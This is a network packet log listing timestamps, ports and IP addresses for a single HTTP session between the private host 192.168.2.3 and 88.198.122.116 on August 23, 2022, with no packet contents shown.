Aug 23, 2022 18:25:29.538661957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538686037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538712025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538738012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538760900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538785934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538811922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538837910 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538863897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538887978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538913965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539139032 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539175034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539200068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539225101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539252996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539278984 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539302111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539324999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539381981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539410114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539433956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539458990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539483070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539508104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539535046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539558887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539582968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539606094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539628983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539653063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539678097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539700985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539726019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539752960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539777040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539802074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539825916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539849997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539877892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.539912939 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.539933920 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.542445898 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.542519093 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.542840958 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.542854071 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.542895079 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.542928934 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.542956114 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.542982101 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.543004036 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.543032885 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.572356939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.572388887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.574884892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.574918032 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.574945927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.574969053 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.574991941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.575012922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.575037956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.575061083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.575083017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.575112104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.575134993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576237917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576266050 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576282024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576306105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576333046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576355934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576378107 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576400995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576425076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576450109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.576472998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577202082 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577266932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577290058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577311993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577333927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577356100 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577378035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577400923 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577421904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577446938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577469110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577491999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577513933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577536106 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577558041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577581882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577603102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577625036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577647924 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577668905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.577692032 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.578739882 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.579746962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579777956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579801083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579833984 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579858065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579879999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579902887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579926014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579948902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579972982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.579993963 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580017090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580039024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580280066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580305099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580327034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580348015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580368996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580389977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580410957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580432892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580452919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580475092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580496073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580517054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580538988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580558062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580579042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580601931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580631971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580651045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580672026 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580693960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580718040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580739975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580806971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580826044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580851078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580876112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580898046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580924034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580956936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.580979109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581001997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581027985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581051111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581074953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581099987 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581123114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581146955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581171989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581218004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581244946 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581271887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581295967 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581321001 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581346035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581370115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581396103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581418991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581442118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581466913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581491947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581516027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581541061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581564903 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581589937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581614971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581638098 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581660986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581686974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581711054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581733942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581758976 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581782103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581804991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581830025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581851959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581876040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581902981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581926107 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581949949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581974983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.581998110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582022905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582047939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582071066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582094908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582119942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582143068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582168102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582192898 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582216978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582241058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582267046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582289934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582314014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582339048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582362890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582386971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582412004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582436085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582459927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582485914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582509995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582534075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582561016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582582951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582603931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582626104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582647085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582668066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582690954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582715034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582786083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582808971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582835913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582860947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582882881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582902908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582926035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582941055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582962036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.582983017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583004951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583025932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583048105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583070040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583092928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583116055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583142042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583167076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583192110 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583215952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583235025 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583239079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583261013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583285093 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583290100 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583307981 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.583323956 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583415985 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583486080 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583628893 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583666086 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583709955 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583758116 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583821058 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583859921 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583901882 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583955050 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.583990097 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.584042072 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.584125042 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.584223032 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.584270954 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.610351086 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.610958099 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.621049881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.624079943 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.647675037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.647712946 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.647751093 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.647780895 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648046017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648066998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648111105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648195028 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648222923 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648248911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648281097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648309946 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648338079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648370028 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648399115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648449898 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648494959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648524046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648547888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648578882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648607016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648637056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648683071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648710966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648736954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648761988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648786068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648812056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648835897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648854971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648880959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648920059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648947954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.648974895 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649002075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649029970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649056911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649084091 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649110079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649137020 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649167061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649194956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649224997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649254084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649283886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649312973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649342060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649373055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649405003 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649434090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649463892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649492979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649522066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649553061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649583101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649615049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649647951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649678946 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649708033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649739027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649766922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649796009 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649827003 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649856091 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649888992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649919033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649950027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.649979115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650008917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650038958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650064945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650094986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650122881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650151014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650181055 CEST	80	49943	88.198.122.116	192.168.2.3
